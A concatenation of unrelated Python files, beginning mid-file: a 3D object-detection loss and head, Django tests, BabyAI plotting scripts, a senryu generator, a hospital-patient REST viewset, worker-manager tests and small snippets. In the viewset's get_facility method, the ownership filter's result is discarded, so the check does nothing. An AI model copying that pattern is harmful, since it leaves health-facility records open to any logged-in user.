pred_locations = self.smoke_coder.decode_location(
targets_proj_points,
pred_proj_offsets,
pred_depths,
targets_variables["K"],
targets_variables["trans_mat"]
)
pred_dimensions = self.smoke_coder.decode_dimension(
targets_variables["cls_ids"],
pred_dimensions_offsets,
)
# we need to change center location to bottom location
pred_locations[:, 1] += pred_dimensions[:, 1] / 2
pred_rotys, pred_alphas = self.smoke_coder.decode_orientation(
pred_orientation,
targets_variables["locations"],
targets_variables["flip_mask"]
)
pred_rotys = pred_rotys.view(batch, -1, 1)
pred_alphas = pred_alphas.view(batch, -1, 1)
if self.reg_loss == "DisL1":
pred_box3d_rotys = self.smoke_coder.encode_box3d(
pred_rotys,
targets_variables["dimensions"],
targets_variables["locations"]
)
pred_box3d_dims = self.smoke_coder.encode_box3d(
targets_variables["rotys"],
pred_dimensions,
targets_variables["locations"]
)
pred_box3d_locs = self.smoke_coder.encode_box3d(
targets_variables["rotys"],
targets_variables["dimensions"],
pred_locations
)
return dict(ori=pred_box3d_rotys,
dim=pred_box3d_dims,
loc=pred_box3d_locs, )
elif self.reg_loss == "L1":
pred_box_3d = self.smoke_coder.encode_box3d(
pred_rotys,
pred_dimensions,
pred_locations
)
return pred_box_3d
def __call__(self, predictions, targets):
pred_heatmap, pred_regression = predictions[0], predictions[1]
targets_heatmap, targets_regression, targets_variables \
= self.prepare_targets(targets)
predict_boxes3d = self.prepare_predictions(targets_variables, pred_regression)
hm_loss = self.cls_loss(pred_heatmap, targets_heatmap) * self.loss_weight[0]
targets_regression = targets_regression.view(
-1, targets_regression.shape[2], targets_regression.shape[3]
)
reg_mask = targets_variables["reg_mask"].flatten()
reg_mask = reg_mask.view(-1, 1, 1)
reg_mask = reg_mask.expand_as(targets_regression)
if self.reg_loss == "DisL1":
reg_loss_ori = F.l1_loss(
predict_boxes3d["ori"] * reg_mask,
targets_regression * reg_mask,
reduction="sum") / (self.loss_weight[1] * self.max_objs)
reg_loss_dim = F.l1_loss(
predict_boxes3d["dim"] * reg_mask,
targets_regression * reg_mask,
reduction="sum") / (self.loss_weight[1] * self.max_objs)
reg_loss_loc = F.l1_loss(
predict_boxes3d["loc"] * reg_mask,
targets_regression * reg_mask,
reduction="sum") / (self.loss_weight[1] * self.max_objs)
loss_all = hm_loss + reg_loss_ori + reg_loss_dim + reg_loss_loc
loss_dict = {}
loss_dict["hm"] = hm_loss.item()
loss_dict["ori"] = reg_loss_ori.item()
loss_dict["dim"] = reg_loss_dim.item()
loss_dict["loc"] = reg_loss_loc.item()
return loss_all, loss_dict, {}
class PostProcessor(nn.Module):
def __init__(self,
smoker_coder,
reg_head,
det_threshold,
max_detection,
pred_2d):
super(PostProcessor, self).__init__()
self.smoke_coder = smoker_coder
self.reg_head = reg_head
self.det_threshold = det_threshold
self.max_detection = max_detection
self.pred_2d = pred_2d
def prepare_targets(self, targets):
dict_ret = {}
dict_ret["trans_mat"] = targets["trans_mat"].view(1,3,3)
dict_ret["K"] = targets["K"].view(1,3,3)
dict_ret["size"] = targets["size"].view(1,2)
return None, None, dict_ret
def forward(self, predictions, targets):
pred_heatmap, pred_regression = predictions[0], predictions[1]
batch, channel = pred_regression.shape[0], pred_regression.shape[1]
_, _, target_varibales = self.prepare_targets(targets)
heatmap = nms_hm(pred_heatmap)
scores, indexs, clses, ys, xs = select_topk(
heatmap,
K=self.max_detection,
)
pred_regression_pois = select_point_of_interest(
batch, indexs, pred_regression
)
pred_proj_points = torch.cat([xs.view(batch, -1, 1), ys.view(batch, -1, 1)], dim=2)
# FIXME: fix hard code here
# pred_regression_pois = pred_regression_pois.view(-1, channel)
pred_depths_offset = pred_regression_pois[..., 0:1]
pred_proj_offsets = pred_regression_pois[..., 1:3]
pred_dimensions_offsets = pred_regression_pois[..., 3:6]
pred_orientation = pred_regression_pois[..., 6:]
pred_depths = self.smoke_coder.decode_depth(pred_depths_offset)
pred_locations = self.smoke_coder.decode_location(
pred_proj_points,
pred_proj_offsets,
pred_depths,
target_varibales["K"],
target_varibales["trans_mat"]
)
pred_dimensions = self.smoke_coder.decode_dimension(
clses,
pred_dimensions_offsets
)
# we need to change center location to bottom location
pred_locations[:, 1] += pred_dimensions[:, 1] / 2
pred_rotys, pred_alphas = self.smoke_coder.decode_orientation(
pred_orientation,
pred_locations
)
if self.pred_2d:
box2d = self.smoke_coder.encode_box2d(
target_varibales["K"],
pred_rotys,
pred_dimensions,
pred_locations,
target_varibales["size"]
)
else:
box2d = torch.tensor([0, 0, 0, 0])
# change variables to the same dimension
clses = clses.view(batch, self.max_detection, 1)
pred_alphas = pred_alphas.view(batch, self.max_detection, 1)
box2d = box2d.view(batch, self.max_detection, 4)
pred_rotys = pred_rotys.view(batch, self.max_detection, 1)
scores = scores.view(batch, self.max_detection, 1)
# change dimension back to h,w,l
pred_dimensions = pred_dimensions.roll(shifts=-1, dims=1)
pred_dimensions = pred_dimensions.view(batch, self.max_detection, -1)
pred_locations = pred_locations.view(batch, self.max_detection, -1)
recall_dict = {}
pred_dicts = []
for index in range(batch):
pred_boxes = [pred_locations[index], pred_dimensions[index], pred_rotys[index]]
pred_boxes = torch.cat(pred_boxes, dim=1)
record_dict = {
'pred_boxes': pred_boxes,
'pred_scores': scores[index],
'pred_labels': clses[index]
}
pred_dicts.append(record_dict)
# result = [clses, pred_alphas, box2d, pred_dimensions, pred_locations, pred_rotys, scores]
# result = [i.type_as(result[0]) for i in result]
# result = torch.cat(result, dim=1)
return pred_dicts, recall_dict
class SMOKEHead(nn.Module):
def __init__(self, num_class, input_channels, model_cfg, predict_boxes_when_training=False, **kwargs):
super(SMOKEHead, self).__init__()
heads = {}
heads["hm"] = num_class
heads["wh"] = model_cfg.HEAD_INFO.WH
heads["reg"] = model_cfg.HEAD_INFO.REG
heads["reg_c"] = model_cfg.HEAD_INFO.REG_C
heads["class"] = model_cfg.HEAD_INFO.CLASS_NAMES
heads["norm"] = model_cfg.HEAD_INFO.NORM_FUNC
heads["dep"] = model_cfg.HEAD_INFO.DEP
heads["rot"] = model_cfg.HEAD_INFO.ROT
heads["dim"] = model_cfg.HEAD_INFO.DIM
self.predictor = SMOKEPredictor(heads, input_channels)
def forward(self, features):
x = self.predictor(features)
return x
|
from django.test import TestCase
from django.forms.models import model_to_dict
from nose.tools import eq_
from apps.assist.unittests.factories import NoticeFactory, BannerFactory, SplashFactory
from apps.assist.serializers import NoticeCreateSerializer, BannerCreateSerializer, SplashCreateSerializer
class TestNoticeSerializer(TestCase):
def setUp(self):
self.data = model_to_dict(NoticeFactory.build())
def test_serializer_with_empty_data(self):
serializer = NoticeCreateSerializer(data={})
eq_(serializer.is_valid(), False)
def test_serializer_with_valid_data(self):
serializer = NoticeCreateSerializer(data=self.data)
eq_(serializer.is_valid(), True)
class TestBannerSerializer(TestCase):
def setUp(self):
self.data = model_to_dict(BannerFactory.build())
def test_serializer_with_empty_data(self):
serializer = BannerCreateSerializer(data={})
eq_(serializer.is_valid(), False)
def test_serializer_with_valid_data(self):
serializer = BannerCreateSerializer(data=self.data)
eq_(serializer.is_valid(), True)
class TestSplashSerializer(TestCase):
def setUp(self):
self.data = model_to_dict(SplashFactory.build())
def test_serializer_with_empty_data(self):
serializer = SplashCreateSerializer(data={})
eq_(serializer.is_valid(), False)
def test_serializer_with_valid_data(self):
serializer = SplashCreateSerializer(data=self.data)
eq_(serializer.is_valid(), True)
|
"""Loading and plotting data from CSV logs.
Schematic example of usage
- load all `log.csv` files that can be found by recursing a root directory:
`dfs = load_logs($BABYAI_STORAGE)`
- concatenate them in the master dataframe
`df = pandas.concat(dfs, sort=True)`
- plot average performance for groups of runs using `plot_average(df, ...)`
- plot performance for each run in a group using `plot_all_runs(df, ...)`
Note:
- you can choose what to plot
- groups are defined by regular expressions over full paths to .csv files.
For example, if your model is called "model1" and you trained it with multiple seeds,
you can filter all the respective runs with the regular expression ".*model1.*"
- you may want to load your logs from multiple storage directories
before concatening them into a master dataframe
"""
import os
import re
import numpy as np
from matplotlib import pyplot
import pandas
import random
def load_log(dir_):
"""Loads log from a directory and adds it to a list of dataframes."""
#dir_ = dir_.decode("utf-8")
df = pandas.read_csv(os.path.join(*[dir_, 'log.csv']),
error_bad_lines=False,
warn_bad_lines=True)
if not len(df):
print("empty df at {}".format(dir_))
return
df['model'] = dir_
return df
def load_logs(root):
dfs = []
for root, dirs, files in os.walk(root, followlinks=True):
for file_ in files:
if file_ == 'log.csv':
dfs.append(load_log(root))
return dfs
def plot_average_impl(df, regexps, y_value='return_mean', window=1, agg='mean',
x_value='frames'):
"""Plot averages over groups of runs defined by regular expressions."""
df = df.dropna(subset=[y_value])
unique_models = df['model'].unique()
model_groups = [[m for m in unique_models if re.match(regex, m)]
for regex in regexps]
for regex, models in zip(regexps, model_groups):
df_re = df[df['model'].isin(models)]
# the average doesn't make sense if most models are not included,
# so we only for the period of training that has been done by all models
num_frames_per_model = [df_model[x_value].max()
for _, df_model in df_re.groupby('model')]
median_progress = sorted(num_frames_per_model)[(len(num_frames_per_model) - 1) // 2]
mean_duration = np.mean([
df_model['duration'].max() for _, df_model in df_re.groupby('model')])
df_re = df_re[df_re[x_value] <= median_progress]
# smooth
parts = []
for _, df_model in df_re.groupby('model'):
df_model = df_model.copy()
df_model.loc[:, y_value] = df_model[y_value].rolling(window).mean()
parts.append(df_model)
df_re = pandas.concat(parts)
df_agg = df_re.groupby([x_value]).agg([agg])
values = df_agg[y_value][agg]
pyplot.plot(df_agg.index, values, label=regex)
#print(values)
#print(regex, median_progress, mean_duration / 86400.0, values.iloc[-1])
#pyplot.show()
pyplot.show()
def plot_average(*args, **kwargs):
"""Plot averages over groups of runs defined by regular expressions."""
pyplot.figure(figsize=(15, 5))
plot_average_impl(*args, **kwargs)
pyplot.legend()
def plot_all_runs(df, regex, quantity='return_mean', x_axis='frames', window=1, color=None):
"""Plot a group of runs defined by a regex."""
pyplot.figure(figsize=(15, 5))
df = df.dropna(subset=[quantity])
kwargs = {}
if color:
kwargs['color'] = color
unique_models = df['model'].unique()
models = [m for m in unique_models if re.match(regex, m)]
df_re = df[df['model'].isin(models)]
for model, df_model in df_re.groupby('model'):
values = df_model[quantity]
values = values.rolling(window).mean()
pyplot.plot(df_model[x_axis],
values,
label=model,
**kwargs)
#print(model, df_model[x_axis].max())
pyplot.legend()
def plot_mean_std(dfs, color=None, y_value='validation_success_rate', show_std=False, label=None,plot_all=True, linestyle=None, compute_90val_suc_rate=False, ax=None, marker=None, plot_trend=False):
if y_value == 'validation_success_rate':
for df in dfs:
# convert success rate to percentage
df[y_value] *= 100
# if y_value == 'val_cic':
# # scale for better readability
# for df in dfs:
# df[y_value] *= 1000
df_concat = pandas.concat((dfs))
by_row_index = df_concat.groupby(df_concat.index)
df_means = by_row_index.mean()[y_value]
df_stds = by_row_index.std()[y_value]
num_points = len(df_means)
x = np.arange(1, num_points + 1)
if ax:
ax.plot(x, df_means, label=label, color=color, linestyle=linestyle, marker=marker)
else:
fig, ax = pyplot.subplots()
ax.plot(x, df_means, label=label, color=color, linestyle=linestyle, marker=marker)
ax.xaxis.set_major_locator(pyplot.MaxNLocator(5))
if compute_90val_suc_rate:
print('90% val success rate reached at epoch:')
threshold_idx = next(x[0] + 1 for x in enumerate(list(df_means)) if x[1] >= 90.0)
print(threshold_idx)
if plot_trend:
z = np.polyfit(x, df_means, 1)
p = np.poly1d(z)
pyplot.plot(x, p(x), color="#fc8d62", linestyle="--")
if plot_all:
for df in dfs:
x = np.arange(1, len(df) + 1)
if ax:
ax.plot(x, df[y_value], alpha=0.25, label='_nolegend_', color=color, linestyle=linestyle) #, linewidth=0.5) #, marker=marker)
else:
pyplot.plot(x, df[y_value], alpha=0.25, label='_nolegend_',color=color, linestyle=linestyle) #, linewidth=0.5) #, marker=marker)
if show_std:
pyplot.fill_between(x, df_means - df_stds, df_means + df_stds, facecolor=color, alpha=0.5)
def plot_compared_models(log_roots, nr_runs, title, legend_labels=None, max_update=35, show_std=False, plot_all=True, y_value='validation_success_rate', filename=None, compute_90val_suc_rate=False, plot_trend=False):
pyplot.rc('font', size=18) #14-18
#colors = ['#66c2a5', '#fc8d62', '#ffd92f', '#8da0cb', '#e78ac3', '#a6d854']
colors = ['#fc8d62', '#66c2a5', '#8da0cb', '#e78ac3', '#a6d854', '#ffd92f']
markers = ['o', 'v', '^', 's', '+', 'x']
if legend_labels is None:
legend_labels = [root.split('/')[-1] for root in log_roots]
fig, ax = pyplot.subplots(figsize=(7,5)) #(12,5)
for idx, root in enumerate(log_roots):
dirs = [root + str(i) for i in range(1, nr_runs + 1)]
dfs = []
for dir in dirs:
try:
dfs += [load_log(dir).query('update <=' + str(max_update))]
except:
pass
plot_mean_std(dfs, label=legend_labels[idx], show_std=show_std,plot_all=plot_all,color=colors[idx], marker=markers[idx], y_value=y_value, compute_90val_suc_rate=compute_90val_suc_rate, plot_trend=plot_trend, ax=ax)
pyplot.xlabel('epochs')
if y_value == 'validation_success_rate':
pyplot.ylabel('validation success %')
pyplot.ylim(0, 102)
elif y_value == 'correction_weight_loss':
pyplot.ylabel('guidance weight')
elif y_value == 'val_cic':
#pyplot.ylabel(r'CIC $\times 10^3$')
pyplot.ylabel('CIC')
#pyplot.title(title)
pyplot.legend(loc=4)
#pyplot.legend(loc='upper center', bbox_to_anchor=(0.5, -0.5))
pyplot.tight_layout()
#pyplot.show()
pyplot.savefig(filename)
pyplot.clf()
def plot_cic(cic_file,):
with open(cic_file, 'r') as cf:
values = [float(item) for item in cf.readlines()]
pyplot.plot(np.arange(1, len(values) + 1), values, '-o')
pyplot.xlabel('epoch')
pyplot.ylabel('CIC metric')
pyplot.title('CIC in Learner + pretrained Corrector, GoToObj')
pyplot.show()
def plot_two_vars(log_root, nr_runs, vars, title, max_update=200, show_std=False, plot_all=True, filename=None):
pyplot.rc('font', size=13) # 18
colors = ['#fc8d62', '#66c2a5', '#8da0cb', '#e78ac3', '#a6d854', '#ffd92f']
linestyles = ['-', '--', '-.', (0, (5, 1)), (0, (3, 1, 1, 1)), (0, (1, 1))]
fig, ax1 = pyplot.subplots()
dirs = [log_root + str(i) for i in range(1, nr_runs + 1)]
dfs = []
for dir in dirs:
# print(dir)
try:
dfs += [load_log(dir).query('update <=' + str(max_update))]
except:
pass
ax1.set_xlabel('epochs')
ax1.set_ylabel('validation success %', color=colors[0])
plot_mean_std(dfs, label=vars[0], show_std=show_std, plot_all=plot_all, color=colors[0],
linestyle=linestyles[0], y_value=vars[0], ax = ax1)
ax1.tick_params(axis='y', labelcolor=colors[0])
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel('guidance weight', color=colors[1]) # we already handled the x-label with ax1
plot_mean_std(dfs, label=vars[1], show_std=show_std, plot_all=plot_all, color=colors[1],
linestyle=linestyles[1], y_value=vars[1], ax=ax2)
ax2.tick_params(axis='y', labelcolor=colors[1])
fig.tight_layout() # otherwise the right y-label is slightly clipped
pyplot.title(title)
#pyplot.show()
pyplot.savefig(filename)
pyplot.clf()
# EXAMPLES
#
# roots = ['/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-nocor',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-ownvocab',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-gotolocal',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-putnextlocal',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedlearner-gotolocal',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedlearner-putnextlocal',
# # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-multicor'
# ]
#
# labels = ['Learner',
# 'Learner + Guide, pretrained at same level',
# 'Learner + Guide, pretrained at GoToLocal',
# 'Learner + Guide, pretrained at PutNextLocal',
# 'Learner, pretrained at GoToLocal',
# 'Learner, pretrained at PutNextLocal'
# #'Learner + Guide, \n pretrained at 3 levels'
# ]
#
# plot_compared_models(log_roots=roots, nr_runs=3, title='PickupLoc', legend_labels=labels,
# max_update=25,
# plot_all=False,
# filename='pickuploc-interlevel.pdf')
# roots = ['/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotoobj/gotoobj-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotolocal/gotolocal-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotoobjmaze/gotoobjmaze-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/putnextlocal/putnextlocal-pretrainedcor-cic',
# '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/goto/goto-pretrainedcor-ownvocab',
# ]
#
# labels = ['GoToObj',
# 'GoToLocal',
# 'GoToObjMaze',
# 'PickupLoc',
# 'PutNextLocal',
# 'GoTo'
# ]
#
# epochs = [20,
# 25,
# 8,
# 25,
# 25,
# 25
# ]
#
# for idx, root in enumerate(roots):
# label = [labels[idx]]
# plot_compared_models(log_roots=[root], nr_runs=3, title='CIC',
# legend_labels=label, max_update=epochs[idx],
# y_value='val_cic',
# show_std=True,
# plot_all=False,
# filename=str(label) + '-cic.pdf',
# plot_trend=True)
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
try:
from buildbot_pkg import setup_www_plugin
except ImportError:
import sys
print("Please install buildbot_pkg module in order to install that package, or use the pre-build .whl modules available on pypi", file=sys.stderr)
sys.exit(1)
setup_www_plugin(
name='dashboard-test',
description='',
author=u'Pierre Tardy',
author_email=u'tardyp@gmail.com',
url='/',
license='Apache-2.0',
packages=['dashboard_test'],
package_data={
'': [
'VERSION',
'static/*'
]
},
entry_points="""
[buildbot.www]
dashboard_test = dashboard_test:ep
""",
)
|
#追加ライブラリ
import urllib
import xml.etree.ElementTree as elementtree
import MeCab
import random
WIKI_URL = u"http://wikipedia.simpleapi.net/api?keyword="
class CreateResult:
senryu = ''
furigana = ''
errormessage = ''
word = ''
url = ''
def createSenryu(serch_word):
utftext = serch_word.encode('utf-8')
urlencode = urllib.parse.quote(utftext, '')
request = urllib.request.Request(WIKI_URL + urlencode)
result = CreateResult()
with urllib.request.urlopen(request) as response:
XmlData = response.read()
if len(XmlData) == 0:
result.errormessage = 'Wikipediaに該当ページがありませんでした。'
return result
root = elementtree.fromstring(XmlData)
if len(root) == 0:
result.errormessage = 'Wikipediaに該当ページがありませんでした。'
return result
result.url = root[0][2].text
result.word = root[0][3].text
tagger = MeCab.Tagger('-Ochasen')
nodes = tagger.parseToNode(root[0][4].text)
bunsetsulist = []
PoemPartslist = []
kamigolist = []
nakashichilist = []
shimogolist = []
spellCount = 0
while nodes:
#長文のため分割したいが、いい方法が思い浮かばず保留
splitData = nodes.feature.split(',')
SplitLength = len(splitData)
if SplitLength <= 7:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
furigana = splitData[7]
furiganaCount = mojiCount(furigana)
spellCount += furiganaCount
bunsetsulist.append(nodes)
if splitData[0] in '記号':
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[0] in '助詞' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[0] in '助動詞' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[1] in '非自立' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[1] in '接尾' and len(bunsetsulist) == 1:
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[5] in '未然レル接続' and (furiganaCount == 5 or furiganaCount == 7):
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if splitData[0] in '接頭詞' and (furiganaCount == 5 or furiganaCount == 7):
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if furigana in '*':
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if is_sokuon(furigana[-1]) and (furiganaCount == 5 or furiganaCount == 7):
bunsetsulist = []
spellCount= 0
nodes = nodes.next
continue
if spellCount == 5:
gobiindex = len (bunsetsulist)
if IsKire(bunsetsulist[gobiindex - 1]) == True:
kamigolist.append(list(bunsetsulist))
shimogolist.append(list(bunsetsulist))
else:
kamigolist.append(list(bunsetsulist))
if spellCount == 7:
nakashichilist.append(list(bunsetsulist))
bunsetsulist = []
spellCount= 0
if furiganaCount == 7 :
nodes = nodes.next
continue
if spellCount > 7:
bunsetsulist = []
spellCount= 0
if furiganaCount > 7 :
nodes = nodes.next
continue
nodes = nodes.next
furigana = ''
senryu = ''
bunsho = []
create = False
for count in range(10):
#長文のため分割したいが、いい方法が思い浮かばず保留
furigana = ''
senryu = ''
bunsho = []
create = False
if len(kamigolist) == 0 or len(nakashichilist) == 0 or len(shimogolist) == 0:
result.errormessage = '句の素材がたりず、生成できませんでした。'
return result
kamigo = random.choice(kamigolist)
nakashichi = random.choice(nakashichilist)
shimogo = random.choice(shimogolist)
kamigofurigana = ''
nakahachifurigana = ''
simogofurigana = ''
for spell in kamigo:
senryu += spell.surface
kamigofurigana += spell.feature.split(',')[7]
bunsho.append(spell)
for spell in nakashichi:
senryu += spell.surface
nakahachifurigana += spell.feature.split(',')[7]
bunsho.append(spell)
for spell in shimogo:
senryu += spell.surface
simogofurigana += spell.feature.split(',')[7]
bunsho.append(spell)
furigana += kamigofurigana
furigana += nakahachifurigana
furigana += simogofurigana
#'上五と下五が同じの場合は作り直し'
if kamigofurigana == simogofurigana:
continue
#'中七に上五が含まれている場合は作り直し'
if nakahachifurigana.find(kamigofurigana) != -1:
continue
#'中七に下五が含まれている場合は作り直し'
if nakahachifurigana.find(simogofurigana) != -1:
continue
#上五、中七、下五すべての末で切れている場合は作り直し
Kamigokire = IsKire(kamigo[len(kamigo) - 1])
Nakahachikire = IsKire(nakashichi[len(nakashichi) - 1])
Shimogokire = IsKire(shimogo[len(shimogo) - 1])
if Kamigokire and Nakahachikire and Shimogokire:
continue
#動詞が2つ以上ある場合は作り直し
doshicount = 0
for spell in bunsho:
splitData = spell.feature.split(',')
if splitData[0] in '動詞':
doshicount+= 1
if doshicount >= 2:
continue
create = True
break
if create == False:
result.errormessage = '川柳が作成できませんでした。別の単語を入力してください。'
return result
result.senryu = senryu
result.furigana = furigana
return result
def IsKire(nodes):
splitData = nodes.feature.split(',')
if splitData[5] in '基本形':
return True
elif splitData[0] in '名詞':
return True
else:
return False
def mojiCount(furigana):
mojicount = 0
for moji in furigana:
if is_youon(moji) == False:
mojicount += 1
return mojicount
def is_youon(moji):
youon = ['ぁ',
'ぃ',
'ぅ',
'ぇ',
'ぉ',
'ゃ',
'ゅ',
'ょ',
'ァ',
'ィ',
'ゥ',
'ェ',
'ォ',
'ャ',
'ュ',
'ョ']
return moji in youon
def is_sokuon(moji):
sokuon = ['っ','ッ']
return moji in sokuon
|
from django_filters import rest_framework as filters
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from care.facility.api.mixins import UserAccessMixin
from care.facility.api.serializers.patient import (
FacilityPatientStatsHistorySerializer,
PatientDetailSerializer,
PatientSerializer,
)
from care.facility.api.serializers.patient_consultation import PatientConsultationSerializer
from care.facility.models import Facility, FacilityPatientStatsHistory, PatientConsultation, PatientRegistration
class PatientFilterSet(filters.FilterSet):
phone_number = filters.CharFilter(field_name="phone_number")
class PatientViewSet(UserAccessMixin, viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
queryset = PatientRegistration.objects.filter(deleted=False)
serializer_class = PatientSerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = PatientFilterSet
def get_serializer_class(self):
if self.action == "retrieve":
return PatientDetailSerializer
elif self.action == "history":
return PatientConsultationSerializer
else:
return self.serializer_class
def get_queryset(self):
if self.request.user.is_superuser:
return self.queryset
return self.queryset.filter(created_by=self.request.user)
@action(detail=True, methods=["get"])
def history(self, request, *args, **kwargs):
user = request.user
queryset = PatientConsultation.objects.filter(patient__id=self.kwargs.get("pk"))
if not user.is_superuser:
queryset = queryset.filter(patient__created_by=user)
return Response(data=self.get_serializer_class()(queryset, many=True).data)
class FacilityPatientStatsHistoryFilterSet(filters.FilterSet):
entry_date = filters.DateFromToRangeFilter(field_name="entry_date")
class FacilityPatientStatsHistoryViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
queryset = FacilityPatientStatsHistory.objects.all().order_by("-entry_date")
serializer_class = FacilityPatientStatsHistorySerializer
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = FacilityPatientStatsHistoryFilterSet
http_method_names = ["get", "post", "delete"]
def get_queryset(self):
queryset = super().get_queryset()
return queryset.filter(facility_id=self.kwargs.get("facility_pk"))
def get_object(self):
return get_object_or_404(self.get_queryset(), id=self.kwargs.get("pk"))
def get_facility(self):
facility_qs = Facility.objects.filter(pk=self.kwargs.get("facility_pk"))
if not self.request.user.is_superuser:
facility_qs.filter(created_by=self.request.user)
return get_object_or_404(facility_qs)
def perform_create(self, serializer):
return serializer.save(facility=self.get_facility())
def list(self, request, *args, **kwargs):
"""
Patient Stats - List
Available Filters
- entry_date_before: date in YYYY-MM-DD format, inclusive of this date
- entry_date_before: date in YYYY-MM-DD format, inclusive of this date
"""
return super(FacilityPatientStatsHistoryViewSet, self).list(request, *args, **kwargs)
|
# Copyright 2020 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for launchpad.launch.worker_manager."""
import os
import signal
import threading
import time
from absl.testing import absltest
from launchpad.launch import worker_manager
import mock
class WorkerManagerTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._sigterm_patcher = mock.patch.object(
signal, 'SIGTERM', new=signal.SIGUSR1)
self._sigterm_patcher.start()
self._sigint_patcher = mock.patch.object(
signal, 'SIGINT', new=signal.SIGUSR2)
self._sigint_patcher.start()
self._manager = worker_manager.WorkerManager()
self.addCleanup(self._manager.cleanup_after_test, self)
def tearDown(self):
self._sigterm_patcher.stop()
self._sigint_patcher.stop()
super().tearDown()
def test_wait_for_stop(self):
def waiter():
self._manager.wait_for_stop()
self._manager.thread_worker('worker', waiter)
os.kill(os.getpid(), signal.SIGTERM)
def test_slow_termination(self):
def waiter():
self._manager.wait_for_stop()
time.sleep(1)
self._manager.thread_worker('worker', waiter)
os.kill(os.getpid(), signal.SIGTERM)
def test_system_exit(self):
def waiter():
try:
while True:
time.sleep(0.1)
except SystemExit:
pass
self._manager.thread_worker('worker', waiter)
os.kill(os.getpid(), signal.SIGTERM)
def test_stop_and_wait(self):
def waiter():
self._manager.wait_for_stop()
self._manager.thread_worker('worker1', waiter)
self._manager.thread_worker('worker2', waiter)
self._manager.thread_worker('worker3', waiter)
self._manager.stop_and_wait()
def test_failure_wait(self):
def waiter():
self._manager.wait_for_stop()
def failure():
raise Exception('Error')
self._manager.thread_worker('waiter', waiter)
self._manager.thread_worker('failure', failure)
with self.assertRaisesRegexp(
Exception, 'Error'):
self._manager.wait(['waiter'])
self._manager.wait()
def test_return_on_first_completed(self):
def waiter():
self._manager.wait_for_stop()
def worker():
pass
self._manager.thread_worker('waiter', waiter)
self._manager.thread_worker('worker', worker)
self._manager.wait(return_on_first_completed=True)
def test_dont_raise_error(self):
def failure():
raise Exception('Error')
self._manager.thread_worker('failure', failure)
self._manager.wait(raise_error=False)
with self.assertRaisesRegexp(
Exception, 'Error'):
self._manager.wait()
def test_process_worker_stop(self):
self._manager.process_worker('sleep', ['sleep', '3600'])
self._manager.stop_and_wait()
def test_process_worker_failure(self):
self._manager.process_worker('failure', ['cat', 'missing_file'])
with self.assertRaisesRegexp(
RuntimeError, 'One of the workers failed.'):
self._manager.wait()
if __name__ == '__main__':
absltest.main()
|
import redis
r = redis.Redis(host='localhost', port=6379, db=0)
r.set('foo', 'bar')
x = r.get('foo')
print(x)
r.set(x,'baz')
x = r.get(x)
print(x)
|
from dynamic_graph.sot.torque_control.control_manager import ControlManager
from dynamic_graph.sot.torque_control.tests.robot_data_test import initRobotData
from numpy import array, ones, zeros
# Instanciate the free flyer
cm = ControlManager("cm_test")
q = zeros(initRobotData.nbJoints + 6)
dq = zeros(initRobotData.nbJoints)
bemfFactor = ones(initRobotData.nbJoints)
max_current = 30.0 * ones(initRobotData.nbJoints)
max_tau = 100.0 * ones(initRobotData.nbJoints)
percentageDriverDeadZoneCompensation = 20.0 * ones(initRobotData.nbJoints)
signWindowsFilterSize = ones(initRobotData.nbJoints)
tau = 100.0 * ones(initRobotData.nbJoints)
tau_predicted = 110.0 * ones(initRobotData.nbJoints)
pwmDes = 100.0 * ones(initRobotData.nbJoints)
currentDes = 100.0 * ones(initRobotData.nbJoints)
cm.controlDT = 0.005
# Initializing the input ports
# Setting the robot configuration
cm.add_signals()
cm.i_max.value = max_current
cm.u_max.value = max_tau
cm.tau.value = tau
cm.tau_predicted.value = tau_predicted
